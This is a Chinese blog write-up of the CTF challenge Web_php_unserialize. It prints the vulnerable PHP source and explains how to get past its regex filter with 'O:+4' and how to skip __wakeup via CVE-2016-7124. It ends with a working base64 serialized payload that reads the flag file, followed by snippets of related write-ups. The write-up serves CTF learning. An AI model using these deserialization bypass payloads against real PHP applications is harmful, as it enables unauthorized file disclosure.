Web_php_unserialize,Web_php_unserialize

最新推荐文章于 2024-06-25 04:11:12 发布
最新推荐文章于 2024-06-25 04:11:12 发布
阅读量112 收藏 1
点赞数
文章标签: Web_php_unserialize

Web_php_unserialize

classDemo{

private$file='index.php';

publicfunction__construct($file){

$this->file=$file;

}

function__destruct(){

echo@highlight_file($this->file,true);

}

function__wakeup(){

if($this->file!='index.php'){

//the secret is in the fl4g.PHP

$this->file='index.php';

}

}

}

if(isset($_GET['var'])){

$var=base64_decode($_GET['var']);

if(preg_match('/[oc]:\d+:/i',$var)){

die('stop hacking!');

}else{

@unserialize($var);

}

}else{

highlight_file("index.php");

}

?>

Demo 类可以看出

1. 初始化传入值可以更改类中属性 file 的值

2.flag 在 fl4g.PHP

3. 当 demo 实列销毁时会高亮显示 file 指向的文件内容

此时还没有看见传值点继续往下看

$_GET['var'] 这儿 get 方法传入 var 变量

此时需要满足的条件有:

1. 先进行 base64 加密

2.preg_match() 匹配绕过

3.unserialize() 反序列化执行_wakeup() 的绕过

第一条很好解决, 将传入数据 base64 加密即可.

第二条分析语句, 正则想要匹配的为 o 或 c : 任意长度数字 (至少一个) /i 表示匹配时不区分大小写

将题中所给的类进行序列化, 可得:

"O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.PHP";}"

正则匹配的就是 O:4 , 在这里我们将 4 改为 + 4 即可绕过

第三条类在反序列化后会执行_wakeup() 将 file 的值修改导致文件读取失败

此处把序列化语句中的 1 替换成 2(CVE-2016-7124), 即当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup 的执行.

得到

"O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.PHP";}"

注: 在 PHP 中反序号化相当于字符串转换成变量的过程. 也就是说被序列化的类实例经过反序列化后仍然会生成为一个新的实例, 且会默认执行其中_wakeup 函数 , 而在实例销毁后会执行__destruct 函数.

PS: 在序列化私有变量时, 形成的序列化字符串与公共变量变量的序列化字符串不一样.

例如: 上述的 file 变量在实际中下会生成 "O:4:"Demo":1:{s:10:" Demo file";s:8:"fl4g.PHP";}"

注意这里的 Demo file 前面个有一个空格, 如果在 url 中直接输入序列化字符串需要将空格转换成 %00 即构造

"O:+4:"Demo":2:{s:10:"%00Demo%00file";s:8:"fl4g.PHP";}" 否则会出现变量不对应的问题.

按照题目要求反序列化一下即可

TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

传入 var =TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ== 即可获取 flag

----------------

来源: http://www.bubuko.com/infodetail-3491705.html

点墨楼
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【网络安全 | CTF】攻防世界 Web_php_unserialize 解题详析
等风来
05-28 3747
这段代码接收参数 var,使用 base64_decode 函数对 var 进行解码,然后通过 preg_match 函数判断是否包含类似 o:2的字符串,如果存在则中断程序执行,否则调用 @unserialize 函数进行反序列化操作。这段代码首先定义了一个名为 Demo 的类,包含了一个私有变量 $file 和三个魔术方法 __construct()、__destruct() 和 __wakeup()。3、private在变量名前添加标记\00(classname)\00,长度+2+类名长度,如。
【攻防世界-Web进阶篇-006Web_php_unserialize
gyy990526的博客
03-14 1984
解:打开靶机是一段php代码,代码审计,发现是一道反序列化问题。在上一篇咱们提到过_wakeup()函数需要通过不正确的属性值来绕过,所以这一点已经解决。 <?php class Demo { private $file = 'index.php'; public function __construct($file) { //创建时执行 $this->file = $file; } function __destruct() { //摧
攻防世界web进阶_Web_php_unserialize
chy082的博客
08-21 693
攻防世界web进阶_Web_php_unserialize 解题思路 打开之后是一段代码审计 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file;//构造函数 把里面的参数变成传进来的参数 } function __destruct() { echo @highlight_file($this->file, true); } func
[web] Web_php_unserialize
lonmar的博客
07-03 904
Web_php_unserialize 源码如下: 知识点: 1、__construct():当对象创建(new)时会自动调用。但在 unserialize() 时是不会自动调用的。(构造函数) 2、__destruct():当对象被销毁时会自动调用。(析构函数) 3、__wakeup():unserialize() 时会自动调用 4. 正则 : /[oc]:\d+:/i \d 是匹配一个数字 +表示一个或多个 i忽略大小写(修饰符) [xyz]字符集合,匹配所包含的任意一个字符(x,y,z
Web_php_unserialize
最新发布
2401_82645688的博客
06-25 469
if (isset($_GET[‘var’])) { //检查是否通过get方式传参。//将var通过base64编码。//绕过wakeup。
攻防世界web_php_unserialize
06-28
攻防世界web_php_unserialize是一个关于PHP反序列化漏洞的题目,需要掌握PHP反序列化漏洞的原理和利用方法。在这个题目中,可能会给出一个序列化的字符串,需要将其反序列化并进行一些操作,最终达到获取flag的目的...
攻防世界:反序列化 Web_php_unserialize
zxnimud5的专栏
09-14 504
<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { .
WEB:Web_php_unserialize
sleepywin的博客
07-15 1162
而正则匹配的规则是: 在不区分大小写的情况下 , 若字符串出现 “o:数字” 或者 "c:数字’ 这样的格式 , 那么就被过滤 .很明显 , 因为 serialize() 的参数为 object ,因此参数类型肯定为对象 " O " , 又因为序列化字符串的格式为 参数格式:参数名长度 , 因此 " O:4 " 这样的字符串肯定无法通过正则匹配。是在反序列化操作中起作用的魔法函数,当unserialize的时候,会检查时候存在__wakeup()函数,如果存在的话,会优先调用__wakeup()函数。
攻防世界——Web——Web_php_unserialize
慎铭的博客
02-22 732
题目源代码如下。 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup
攻防世界——Web_php_unserialize
Wking
09-03 129
1.代码审计 发现必须构造Demo传入fl4g.php才能得到flag 同时要绕过匹配和反序列化的函数 2.构造绕过 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight.
攻防世界-----Web_php_unserialize
yanbai3的博客
01-04 1139
攻防世界-----Web_php_unserialize 开始刷web题,发现新世界,记录一下 1.序列化(serialize)和反序列化(unserialize) 序列化就是将对象转化为字节序列/字符串,在序列化对象之前,对象的类要实例化/定义过,字符串中包括了类名、对象中所有变量值,但不包括方法。而反序列化后,会将字符串转换回变量,并重建类或对象。 2.正则表达式 正则表达式是匹配模式,要么匹配字符,要么匹配位置。 建议查看https://juejin.cn/post/68449034871557324
攻防世界Web_php_unserialize
qq_51233573的博客
03-10 2508
最近开始刷攻防世界的web题目,遇到一个比较有意思的题目。ctf小白大家勿喷 访问题目链接 是一段php代码 对代码进行初步审计 发现unserialize函数 可以确定是一个php反序列化的利用 由于刚开始学习php的反序列化 对php不是特别熟悉所以对代码进行逐行解析 <?php class Demo { private $file = 'index.php'; //设置了类的私有变量 public function __construc...
功防世界 Web_php_unserialize
开心星人的博客
05-13 495
<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() {
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值